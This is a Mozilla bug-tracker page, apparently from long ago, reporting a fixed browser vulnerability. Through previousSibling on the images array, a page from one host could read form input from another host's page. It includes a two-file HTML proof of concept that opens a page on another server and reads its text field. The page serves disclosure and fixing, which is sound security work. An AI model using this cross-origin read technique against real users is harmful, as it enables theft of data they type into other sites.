previousSibling vulnerability

VERIFIED FIXED

Status

()

Core
Security
P3
normal
VERIFIED FIXED
19 years ago
11 years ago

People

(Reporter: joro, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows 95
Points:
---
Bug Flags:
in-testsuite ?

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

19 years ago
previousSibling is exposed in the images array. This allows access to parts of
the DOM of a document from another host. Especially bad is accessing the forms
array by using images[x].previousSibling.

The code is:
------------------------read3.html-----------------------------------
<HTML>
<HEAD><TITLE>Images 2</TITLE>
</HEAD>
Type something in the INPUT element in the other window, then
<SCRIPT>
a=window.open("http://lists.nat.bg/~joro/mozilla/links2.html");
function f()
{
alert("The value
is:"+a.document.images[1].previousSibling.previousSibling.elements[0].value);
}
</SCRIPT>
<A HREF="javascript:f()">click here to get it</A>
</HTML>
---------------------------------------------------------------------

------------------links2.html (on another web  server)---------------
<HTML>
<IMG SRC="ball.gif">
<FORM NAME="f" ACTION="#">
<INPUT TYPE="TEXT">
<INPUT TYPE="SUBMIT">
</FORM>
<IMG SRC="ball.gif">
</HTML>
---------------------------------------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
(Assignee)

Updated

19 years ago
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED
(Assignee)

Comment 1

19 years ago
This should have been checked by the default preferences, but the mechanism got
skewed. Hopefully the changes I've committed will make it harder for this to
happen in the future.

Until this change hits, however, all DOM property access must be considered broken.

Comment 2

19 years ago
Verified fixed.
Status: RESOLVED → VERIFIED

Comment 3

19 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.